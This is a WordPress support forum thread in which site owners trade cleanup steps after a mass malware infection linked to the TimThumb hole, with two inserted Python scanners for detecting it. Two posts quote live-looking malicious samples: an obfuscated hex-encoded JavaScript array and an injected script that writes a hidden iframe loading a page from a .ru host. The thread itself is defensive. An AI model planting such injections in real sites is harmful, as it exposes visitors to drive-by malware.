Google issuing warnings about WP site: "content from counter-wordpress.com"? (58 posts)

  1. Ian Dore
    Member
    Posted 2 years ago #

    Hey troops,

    I got this off a Slider plugin but I still got an error message with:

    http://*******.com/wp-includes/js/l10n.js?ver=20101110

    Is it just the plugin that is knackered or something else?

    Just asked the server boys to rinse it out and hopefully that will work. The plugin incidentally is called 'Easing Slider' by Matt Ruddy.

    Anything else I need to do?

  2. asdevargas
    Member
    Posted 2 years ago #

    Hello!
    I went through all the steps of changing the FTP and MySQL passwords and uploading a new version of WordPress, but when I run http://example.com/wp-admin/install.php I get a message that says "You appear to have already installed WordPress. To reinstall please clear your old database tables first." Do I have to clear the actual DB, install, and then execute a copy of the DB? I don't want to lose all I have on my site!!
    Thanks for helping...

  3. Jorge
    Member
    Posted 2 years ago #

    I have an Elegant Theme and they said they don't use TimThumb anymore because of its known vulnerabilities (no kidding!!)

    You can download a fresh theme from them without TimThumb; I would suggest that. Those are the themes that made me an expert overnight on TimThumb. lol

  4. Nihad Nagi
    Member
    Posted 2 years ago #

    (PLEASE TRY THIS BEFORE RANDOM RE-INSTALLATIONS, WHICH IS VERY TIME-CONSUMING, AND DOESN'T ENSURE RECURRENCE EVERYDAY)

    Hi everyone who is facing the Google Chrome security issue. The resolution consists of two processes that should be done in sequence:

    1) Log in to your cpanel and open the wp-config.php file. Note that the file should not exceed 92 lines, with

    /** Sets up WordPress vars and included files. */
    require_once(ABSPATH . 'wp-settings.php');

    that should be the last line in the file.
    But surprisingly, it will exceed 6000 lines. Scroll down, and you might think it's empty; well, it's not: around line 5000 you will find a strange code patch. Don't try to edit the file by removing the code, because when you delete all the code after the line mentioned above and save the file, you will get a fatal error. So copy all the code from the beginning to around line 92 (the line mentioned above), then create a new file named XXXXXX.php and paste the copied code into it (optional: you can create another as a backup of your configuration settings), then save the file. Check that the new file exists, open it and ensure the pasted settings are in place within the file (PLEASE, don't skip this step). Then rename the old wp-config.php to, say, "OLD-wp-config.php", then rename the XXXXX.php to wp-config.php.

    2) You will still receive the message if you access your blog, because you have to update Google via your Google webmasters tool: go to the dashboard of the domain that you are getting the message for, go to diagnostics-malware, and you should receive this message: "Google has not detected any malware on this site." Then request a review, and in less than 60 seconds the message is gone.

    After that I recommend that you change your admin password, and change the permission settings for the new wp-config.php, which is the vulnerability we left open to WordPress competitors; I guess we all know them. So it has nothing to do with WordPress; it's a user-created vulnerability, we did it.
    PLEASE PROVIDE ME WITH FEEDBACK. I hope I helped.

  5. Jorge
    Member
    Posted 2 years ago #

    "You appear to have already installed WordPress. To reinstall please clear your old database tables first." Do I have to clear the actual DB, install, and then execute a copy of the DB?

    Sad to say, I'm not using the old database because I felt it might be compromised. I also have not had the time to research the database to find any injected tables. I had to rebuild from scratch but I caught these issues when I was building a new Website, not when it was in production. I have literally done double the work to get my Network back to production level.

    I wasn't going to take any chances because it will be deployed to a very discriminating client base. I'm not saying to do anything that I did, I'm simply giving you information on my experience.

    The attack on my site had different symptoms than others. For example, I found two /upd.php files (one in my /wp-content directory and the other in the /wp-admin dir) and I recognized them as injected files. While others experienced this same issue, other issues they mentioned were not present on my site, and everyone that I have spoken to has had a slightly different experience.

    Best wishes

  6. asdevargas
    Member
    Posted 2 years ago #

    oohh.... :-(
    I think I messed it up... I already erased and reinstalled everything
    The "home" is here, but it doesn't find the rest of the contents...
    http://www.devargas.com.es
    Any clue?...

  7. Jorge
    Member
    Posted 2 years ago #

    the file should not exceed 92 lines

    It's more if it's a Network install, or if you're running a plugin like Simple Facebook Connect and inserted code into the /wp-config.php file.

  8. Nihad Nagi
    Member
    Posted 2 years ago #

    Whatever, BUT NOT AROUND 5000 lines of settings. You will still find strange code injected after more than 3000 empty lines, right? It's not the time for nit-picking; I just hope you get the idea, and it will work, which is much better than seeing that most of the people here have lost time and CONTENT, and it will happen again, right? And above all, nothing was fixed. I just wrote and I hope it works for even one person in this forum. Thanks, everyone.

  9. matale
    Member
    Posted 2 years ago #

    What I did:
    Backed up the site using BackWPup, which also saves an XML export.
    Nuked the site completely, from the re-seller account.
    Re-created the site.
    Re-installed WordPress with an updated theme to fix the timthumb hole.
    Imported the WordPress XML.
    Uploaded the uploads directory using FTP.

  10. asdevargas
    Member
    Posted 2 years ago #

    I definitely took the long way home, but it seems that it's now fixed... Thank you for helping!!

  11. EricBobrow
    Member
    Posted 2 years ago #

    Thank you nihadnagi!

    My site http://www.acbestpractices.com got warnings in Chrome, but no apparent problem in other browsers. I did a scan with http://sitecheck.sucuri.net/scanner/ and it found that one of the files in the /wp-includes/js/ folder was infected with a known javascript malware. I re-uploaded that file from a reference copy of WP 3.2.1, then rescanned at Sucuri and it came up clean.

    THEN, I went to the wp-config.php file, and found it was 4000+ lines in length. I followed nihadnagi's advice, and copied the first 94 lines (in my case) to a new php file, made sure it was properly saved, then uploaded it and renamed it to wp-config.php (after renaming the other corrupted file).

    Now my site scans clean, and I know that the wp-config file is restored to a proper state. I'll go ahead and change all my passwords too.

    One problem remains: in Chrome, the URL still comes up with a warning, but Google Webmaster Tools says the site is OK - so I can't request a malware review. They say that in some cases it may take a day or more for GWT to have the malware information, and to check back later - so for now I think I'm clean but the site will still come up with warnings in Chrome for visitors.

    Any other advice??

  12. urbanbedougirl
    Member
    Posted 2 years ago #

    Alright I did everything that was recommended and now my blog is gone! It's completely wiped out. I have no idea what to do - how do I get my posts back? I wasn't able to back anything up because I couldn't even get to my dashboard.

  13. urbanbedougirl
    Member
    Posted 2 years ago #

    Oh and I STILL can't get onto my dashboard. I just want to get my posts and go back to Blogger. I've had problems with WP since day one.

  14. darkpollo
    Member
    Posted 2 years ago #

    Hi, I have been infected with this hack.
    Maybe this can help somebody.
    More than one .js file could be affected and the scanner will not detect it.
    Search for
    var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37\x3D\x27\x33\x27\x3B\x30\x2E\x31\x2E\x61\x3D\x27\x34\x27\x3B\x30\x2E\x31\x2E\x6B\x3D\x27\x34\x27\x3B\x30\x2E\x69\x3D\x27\x66\x3A\x2F\x2F\x67\x2D\x68\x2E\x6D
    or similar in your .js files.
    I found several .js files infected in plugins and themes.
    Also I found more timthumb.php files in plugins and themes, and I removed them all too.
    Now everything is clean.
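
Added example (not part of any post in this thread): a Python sketch of the search described in the post above, walking a WordPress directory for .js files that contain a `_0x...` array of `\xNN`-escaped strings and listing every timthumb.php it finds. The regex threshold, the function names and the demo tree are assumptions made for this example; matches are candidates to compare against a reference copy, and renamed copies of timthumb.php are not detected.

```python
import os
import re
import sys

# A variable named like _0x4de4 assigned an array whose first string is a long
# run of \xNN escapes. The minimum of 20 escapes is an assumption for this example.
OBFUSCATED_RE = re.compile(
    r'var\s+_0x[0-9a-fA-F]+\s*=\s*\[\s*"(?:\\x[0-9a-fA-F]{2}){20,}')

def scan_tree(root):
    """Walk root; return (suspect_js, timthumb_files) as sorted relative paths."""
    suspect_js, timthumb_files = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name.lower() == "timthumb.php":
                timthumb_files.append(rel)  # matches by file name only
            elif name.lower().endswith(".js"):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if OBFUSCATED_RE.search(fh.read()):
                        suspect_js.append(rel)
    return sorted(suspect_js), sorted(timthumb_files)

def build_demo_tree(root):
    """Write a constructed tree: one clean .js, one flagged .js, one timthumb.php."""
    escaped = "".join("\\x%02X" % b for b in b"constructed harmless sample text")
    files = {
        "wp-includes/js/l10n.js": 'var _0x1a2b=["%s"];\n' % escaped,
        "wp-includes/js/clean.js": 'function ok(){return "\\x41";}\n',
        "wp-content/themes/demo/timthumb.php": "<?php // constructed placeholder\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)

if __name__ == "__main__":
    # Usage: python scan.py /path/to/wordpress
    js_hits, thumbs = scan_tree(sys.argv[1])
    for rel in js_hits:
        print("obfuscated JS candidate:", rel)
    for rel in thumbs:
        print("timthumb.php present:   ", rel)
```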

  15. Nihad Nagi
    Member
    Posted 2 years ago #

    I am truly happy it worked for you Eric, but let me note something about this issue: the question is, how did anyone get access to any plug-in code in the first place, and change any js libraries? Via this security hole!!! Whatever changes that might work today, they can manipulate This is specially for Eric, you are right about the update to take place, to do it INSTANTLY, you can either:
    1)
    search the help center for the term "malware" and choose the result named "Request a malware review of your site ", or follow this link directly:

    http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=163633

    a pop-up window named "Request a malware review of your site" will appear, and you will find this text:

    Once you're sure your site is free from any infected code and content, you can request a malware review. (CLICK ON THE LINK IN THE ABOVE TEXT IN A NEW TAB, and then click the second process), and then click on the link "reconsideration request", and then recheck instantly you are done.

    OR
    2)resubmit the whole url (you have 10 re-submissions/month)

    But the first will do, cause it did for me, and was all gone in seconds.

    That will do, Eric. Glad it worked for you and everybody in this forum. No matter what changes were done today, the hole via this config file will remain open. Good luck, everyone. Thank you, Eric.

  16. Nihad Nagi
    Member
    Posted 2 years ago #

    SORRY FOR THE LINE, MY POST REPOSTED FOR ERIC & EVERYONE

    I am truly happy it worked for you Eric, but let me note something about this issue for everyone: the question is, how did anyone get access to any plug-in code in the first place, and change any js libraries? Via this security hole!!! Whatever changes that might work today, they can manipulate them again tomorrow. R u ready for that?
    This is specially for Eric, you are right about the update to take place, to do it INSTANTLY, you can either:
    1)
    search the help center for the term "malware" and choose the result named "Request a malware review of your site ", or follow this link directly:

    http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=163633

    a pop-up window named "Request a malware review of your site" will appear, and you will find this text:

    Once you're sure your site is free from any infected code and content, you can request a malware review. (CLICK ON THE LINK IN THE ABOVE TEXT IN A NEW TAB, and then click the second process), and then click on the link "reconsideration request", and then recheck instantly you are done.

    OR
    2)resubmit the whole url (you have 10 re-submissions/month)

    But the first will do, cause it did for me, and was all gone in seconds.

    That will do, Eric. Glad it worked for you and everybody in this forum. No matter what changes were done today, the hole via this config file will remain open. Good luck, everyone. Thank you, Eric.

  17. Nihad Nagi
    Member
    Posted 2 years ago #

    TO URBAN WHO LOST EVERYTHING & EVERYONE ELSE, DON'T WORRY, CALM DOWN.

    Before helping you out, I have one question:

    Did you access phpMyAdmin via your cpanel? If not, don't you worry.

    If anyone has the same problem as URBAN, my email is nihadnagi@hotmail.com. I will stay online, because this must be handled one by one. I will be happy to help anyone here, because I know how it feels when a blog is gone like dust in the wind.

  18. Sanjeev Mohindra
    Member
    Posted 2 years ago #

    What a morning, woke up to see this warning on the site.

    Checked wp-config was fine, scanned the site, got this file infected

    http://*******.com/wp-includes/js/l10n.js?ver=20101110

    replaced the file with wordpress latest version, reinstall wordpress through dashboard..

    moved wp-config to one level up for security reasons...

    rescanned, everything comes good...

    Clear the browser history to check if I still get this message, and it doesn't....changed all the passwords also..

    Thanks for all the help on this thread, otherwise it would have been a mess...

  19. urbanbedougirl
    Member
    Posted 2 years ago #

    Big thanks to nihadnagi - he helped me restore my blog and clear the malware from my site. I'm very grateful for all of your help and patience with me. :)

  20. laptopstickershop
    Member
    Posted 2 years ago #

    I made a video on how to get rid of the malware content and the warning on your wordpress site here:

    http://www.youtube.com/watch?v=o22faoUkfaE&feature=channel_video_title

    I got the malware on my site because I installed a plugin that was a caching plugin that was supposed to help my site run faster, but instead I got malware!

    Hope this helps everyone.

  21. Daniel Cid
    Member
    Posted 2 years ago #

    We also posted more details here:

    http://blog.sucuri.net/2011/08/mass-infection-of-wordpress-sites-counter-wordpress-com.html

    Hope it helps people to understand what is going on. Also, if you cleaned the .js file and are still seeing a warning, try to clear your browser cache.

    thanks,

  22. linji45thgen
    Member
    Posted 2 years ago #

    I have 4 sites blacklisted from this, but when I ran the sucuri sitecheck, it came back clean. I changed the two javascript files nonetheless (for not only the four sites, but the other sites on the same host).

    My host did a virus scan and came up with a few of these types of results:
    {HEX}gzbase64.inject.unclassed.14 : ./site1.com/wp-content/plugins/adsense-now/adsense-now.php
    {HEX}base64.inject.unclassed.6 : ./site2.com/wp-content/plugins/wpematico/app/options-settings.php
    {HEX}php.nested.base64.499 :

    So, for sure my Adsense Now plugin is part of some kind of issue. Not sure if the scan is even related to this counter-wordpress issue, though.

  23. Elegant Themes
    Member
    Posted 2 years ago #

    I have been troubleshooting several sites that have been hit with this attack. I notice 2 major hacks going around over the past few days. Once you have updated your theme and removed timthumb (or updated it), here is some info on how to help clean up your site.

    If you have already been hit, then the first thing you should do is open wp-config.php and look for any suspicious code. Generally, you should delete everything after:

    require_once(ABSPATH . 'wp-settings.php');

    Check for suspicious whitespace as well. In one of the attacks, hundreds of lines of white space have been added to try and mask the malicious code.

    Next open index.php and delete everything between:

    require('./wp-blog-header.php');

    ...

    ?>

    After that I would re-install WordPress from within the WordPress Dashboard via the Updates tab to clean up the infected .js files. When you have done that I would probably run Clam-AV if you have it installed, as well as http://sitecheck.sucuri.net/scanner/. Clam will help pick up any suspicious code that has been obfuscated in base64.

    Finally, be sure to change your MySQL passwords and wp-admin passwords just in case. It's also worth mentioning that the timthumb vulnerability affects inactive themes as well. This script is very popular throughout the theme community. I would delete all of your inactive themes just to make sure you don't have any timthumb.php files laying around.
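
Added example (not part of any post in this thread): a Python sketch of the wp-config.php check described in the post above and earlier in the thread. Because the legitimate line count varies between installs, it anchors on the `require_once(ABSPATH . 'wp-settings.php');` line and reports blank-line padding and any code that follows it. The function name, the padding threshold and both sample files are assumptions constructed for this example.

```python
import re
import sys

# Final bootstrap line of wp-config.php, with or without parentheses.
REQUIRE_RE = re.compile(
    r"""require_once\s*\(?\s*ABSPATH\s*\.\s*['"]wp-settings\.php['"]\s*\)?\s*;""")
PAD_LIMIT = 5  # assumption: more blank lines than this after the require is padding

def audit_wp_config(text):
    """Report what follows the first wp-settings.php require in wp-config.php text."""
    lines = text.splitlines()
    report = {"total_lines": len(lines), "require_line": None,
              "blank_padding": 0, "suspicious": [], "status": "no-require-line"}
    for idx, line in enumerate(lines):
        match = REQUIRE_RE.search(line)
        if match:
            break
    else:
        return report  # require line missing: the file needs manual review
    report["require_line"] = idx + 1
    # Code appended on the same line, after the semicolon, also counts.
    same_line = line[match.end():].strip()
    if same_line and same_line != "?>":
        report["suspicious"].append((idx + 1, same_line[:60]))
    for lineno, tail in enumerate(lines[idx + 1:], start=idx + 2):
        stripped = tail.strip()
        if not stripped:
            report["blank_padding"] += 1
        elif stripped != "?>":  # a lone closing PHP tag is harmless
            report["suspicious"].append((lineno, stripped[:60]))
    if report["suspicious"]:
        report["status"] = "suspicious"
    elif report["blank_padding"] > PAD_LIMIT:
        report["status"] = "padded"
    else:
        report["status"] = "clean"
    return report

# Constructed samples (not taken from any real site).
CLEAN = ("<?php\ndefine('DB_NAME', 'example');\n"
         "/** Sets up WordPress vars and included files. */\n"
         "require_once(ABSPATH . 'wp-settings.php');\n")
TAMPERED = CLEAN + "\n" * 3000 + "echo 'constructed stand-in for injected code';\n"

if __name__ == "__main__":
    # Usage: python audit.py /path/to/wp-config.php (no argument audits TAMPERED)
    source = (open(sys.argv[1], encoding="utf-8", errors="replace").read()
              if len(sys.argv) > 1 else TAMPERED)
    result = audit_wp_config(source)
    print(result["status"], "require at line", result["require_line"], "of",
          result["total_lines"], "blank padding:", result["blank_padding"])
    for lineno, snippet in result["suspicious"]:
        print("  line %d: %s" % (lineno, snippet))
```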

  24. eph2810
    Member
    Posted 2 years ago #

    Okay - reading through this thread means that I am not the only one who got hacked within the last 48 hours. My problem? I have three sites :( ...Don't know how I can find the time to fix them all.

    Thank you all for your help though; I might get my sites back up and running.

  25. eph2810
    Member
    Posted 2 years ago #

    I have my sites on Google's Webmaster Tool and they have given me the information where to find the hack. It is the same hack 'darkpollo' described. Now off to cleaning my blog, hopefully :)

  26. thunpro
    Member
    Posted 2 years ago #

    I just found this forum post after my own blog was hacked with the same exploit the last few days.

    I discovered that my wp-config file was several thousand lines long (instead of the 90 or so lines it should be), and Google Chrome was blocking access to my site as well.

    Thankfully, I use a premium backup plugin called BackupBuddy. I highly recommend using it.

    Thankfully I was able to restore a full, clean back-up with it, and change MySQL database details in the process.

    But that still doesn't fix the exploit. I had no idea about this timthumb.php thing - never heard of it before.

    So I did some digging and found the following website that lists ALL the WordPress themes and plugins that use timthumb.php in some way. Thought this might be very useful for others on here who don't think they have timthumb either:

    http://www.websitedefender.com/web-security/timthumb-vulnerability-wordpress-plugins-themes/

  27. deepak010188
    Member
    Posted 2 years ago #

    Hi,

    Google Webmaster Tools found a malware problem on my site in the form of this script:
    <script type="text/javascript">
    document.write('<iframe src="http://rycgoka.ru/count1.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
    </script>

    Can anyone tell me how I can remove this script from my site?
    This script appears on my home page in the head section,
    and I only use two plugins, one for the Google webmaster tool and the other for the Google analytics tool, and I checked these plugins for this script.
    Please give me some solution.

  28. Jagan Krishnaraj
    Member
    Posted 2 years ago #

    I got the same problem, and I resolved this issue within a couple of days. I wrote about my experience here:

    http://www.theprogrammersguide.com/overcoming-malware-backlisting-by-google/

    I hope the information helps.

    In my case it was a problem with the .htaccess file on my webserver.

Topic Closed

This topic has been closed to new replies.
